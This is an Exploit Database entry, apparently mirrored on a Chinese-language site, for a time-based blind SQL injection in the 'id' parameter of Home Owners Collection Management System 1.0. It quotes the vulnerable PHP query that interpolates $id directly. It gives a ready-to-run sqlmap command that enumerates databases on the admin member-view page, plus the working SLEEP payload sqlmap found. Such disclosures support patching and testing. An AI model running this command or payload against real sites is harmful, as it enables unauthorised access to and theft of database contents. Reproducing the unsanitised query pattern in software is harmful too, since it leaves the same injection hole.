Home Owners Collection Management System 1.0 – ‘id’ Blind SQL Injection

• Exploit Database
• 17 阅读

• 作者： Saud Alenazi
  日期： 2022-02-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50732/

• # Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
  # Date: 9/02/2022
  # Exploit Author: Saud Alenazi
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
  # Version: 1.0
  # Tested on: XAMPP, Windows 10
  
  
  # Vulnerable Code
  
  line 68 in file "/hocms/admin/members/view_member.php"
  
  $collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");
  
  
  # Sqlmap command:
  
  sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
  
  # Output:
  
  Parameter: id (GET)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member